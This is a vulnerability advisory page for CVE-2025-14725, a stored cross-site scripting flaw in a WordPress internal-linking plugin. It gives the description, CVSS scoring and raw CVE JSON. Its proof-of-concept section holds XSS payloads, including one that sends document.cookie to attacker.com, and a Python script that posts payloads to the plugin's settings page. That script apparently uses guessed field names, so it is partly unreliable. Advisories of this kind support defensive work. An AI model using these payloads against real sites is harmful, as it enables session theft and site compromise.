Security Vulnerability Report
中文
CVE-2025-14725 CVSS 4.4 MEDIUM

CVE-2025-14725

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42

Description

The Internal Link Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Internal Link Builder插件 <= 1.0(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-14725 PoC - Stored XSS in Internal Link Builder Plugin --> <!-- Requires admin-level privileges --> <!-- Step 1: Inject malicious JavaScript via plugin settings --> <!-- Example payload in link text or URL field --> <script>alert(document.cookie)</script> <!-- Or more sophisticated payload for cookie stealing --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- Step 2: When admin accesses settings page or any page rendering the stored data --> <!-- The malicious script will execute automatically --> <!-- Python PoC for automation --> import requests target_url = "http://vulnerable-site.com/wp-admin/admin.php?page=internal-link-builder-settings" payload = { "internal_link_builder_text": "<script>alert('XSS')</script>", "internal_link_builder_url": "<img src=x onerror=alert(document.domain)>", "submit": "Save Changes" } session = requests.Session() # Assume valid admin session cookies are obtained session.cookies.set('wordpress_admin_cookie', 'admin_session_value') response = session.post(target_url, data=payload) print(f"XSS payload injected. Status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14725", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.207", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Internal Link Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}, {"lang": "es", "value": "El plugin Internal Link Builder para WordPress es vulnerable a cross-site scripting almacenado a través de la configuración de administrador en todas las versiones hasta la 1.0, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite que atacantes autenticados, con permisos de nivel de administrador y superiores, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada. Esto solo afecta a las instalaciones multisitio y a las instalaciones donde se ha deshabilitado unfiltered_html."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/internal-link-builder/trunk/InternalLinkBuilder.php#L133", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1febe071-b296-4958-a9e8-9be9391f2390?source=cve", "source": "[email protected]"}]}}